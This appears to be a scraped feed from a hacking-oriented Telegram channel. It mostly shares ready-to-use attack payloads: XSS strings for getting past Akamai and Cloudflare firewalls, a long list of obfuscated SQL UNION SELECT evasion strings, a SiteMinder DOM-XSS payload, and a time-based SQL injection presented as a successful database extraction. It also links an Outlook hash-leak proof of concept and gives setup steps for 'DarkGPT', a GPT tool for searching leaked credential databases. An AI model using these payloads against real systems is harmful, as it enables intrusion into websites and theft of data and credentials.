Defcon Media Server - This is an "index of /" with files from the Defcon Archive.
Link
#onion #Darkweb
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#onion #Darkweb
——————
0Day.Today
@LearnExploit
@Tech_Army
❤5👍3🤝1
❤🔥8🫡2👍1
┌──(LearnExploit㉿kali)-[~]
└─$ sudo rm -rf 1402
┌──(LearnExploit㉿kali)-[~]
└─$ sudo mkdir 1403
iliyahr , AT7 , R4DiKaLL , X0P4Sh4 , А.Хоссейни——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥13👍2💯1
0Day.Today | Learn Exploit | Zero World | Dark web |
┌──(LearnExploit㉿kali)-[~] └─$ sudo rm -rf 1402 ┌──(LearnExploit㉿kali)-[~] └─$ sudo mkdir 1403 iliyahr , AT7 , R4DiKaLL , X0P4Sh4 , А.Хоссейни —————— 0Day.Today @LearnExploit @Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
❤9❤🔥2👍1
Akamai WAF bypass XSS
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4🔥3💯2⚡1❤1
Bypass SQL union select
#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
🔥11👍5❤🔥2⚡1❤1
bypass XSS Cloudflare WAF
Encoded Payload:
Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Encoded Payload:
"><track/onerror='confirm\%601\%60'>
Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥8👍4
bbscope
Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!
Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well.
Reverse engineering god? No worries, you can get a list of binaries to analyze too :)
Installation:
Make sure you've a recent version of the Go compiler installed on your system. Then just run:
Usage:
Github
⬇️ Download
🔓
#GO #Grabber #Scope #BugBounty
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!
Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well.
Reverse engineering god? No worries, you can get a list of binaries to analyze too :)
Installation:
Make sure you've a recent version of the Go compiler installed on your system. Then just run:
GO111MODULE=on go install github.com/sw33tLie/bbscope@latest
Usage:
bbscope (h1|bc|it|ywh|immunefi) -t <YOUR_TOKEN> <other-flags>
Github
⬇️ Download
🔓
LearnExploit
#GO #Grabber #Scope #BugBounty
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡4❤2🔥1
Scan for [CVE-2023-49785] ChatGPT-Next-Web - SSRF/XSS
⬇️ Download
🔓
#BugBounty #Nuclei #Templates
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⬇️ Download
🔓
BugCod3
#BugBounty #Nuclei #Templates
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡3❤1🔥1
CVE-2024-21413: Microsoft Outlook Leak Hash
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC
#CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC
#CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
❤🔥2👍1
Forwarded from Bypass Network | رفع فیلترینگ
جریان فیلترینگ اخیر و همچنین نحوه ی عملکرد فرگمنت در این فیلترینگ ؟
در پست بعدی به طور کامل باهاش آشنا میشیم.
➖➖➖➖➖➖➖➖➖➖➖
🔸IR0Day.Today Group
🔹@BypassNetWork
دو سوالی هست که کمتر کسی به صورت کامل در رابطه با آنها صحبت کرده اند.
در پست بعدی به طور کامل باهاش آشنا میشیم.
➖➖➖➖➖➖➖➖➖➖➖
🔸IR0Day.Today Group
🔹@BypassNetWork
⚡3❤2👍1🤬1
XSS of the day : DOM-XSS-SiteMinder
Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
Nuclei tamplete
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
Nuclei tamplete
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6❤🔥3
SQL Injection
After this, I used ghauri to extract the database It was successful
#SQL #Injection #ghauri #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
After this, I used ghauri to extract the database It was successful
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--
#SQL #Injection #ghauri #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡8🔥3👍2❤1
DarkGPT is an OSINT assistant based on GPT-4-200K (recommended use) designed to perform queries on leaked databases, thus providing an artificial intelligence assistant that can be useful in your traditional OSINT processes.
cd DarkGPT
mv .example.env .env
vim .env
DEHASHED_API_KEY="your_dehashed_api_key_here"
DEHASHED_USERNAME="your_dehashed_username"
OPENAI_API_KEY="API_KEY from openai.com"
pip install -r requirements.txt
python3 main.py
LearnExploit
#Dark #GPT
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6⚡4🔥3❤🔥1👍1
(4.2.4) has been released. Enjoy.
#Wireshark #Released
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8⚡2❤1
اگر یادتون باشه ۳ ماه پیش سورس کد های GTA V با هک شدن راکستار لیک شد که داخل چنلم هست فایلش مثه اینکه یه گروه قراره GTA برای اندروید پورت کنن ⚡️
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥17❤1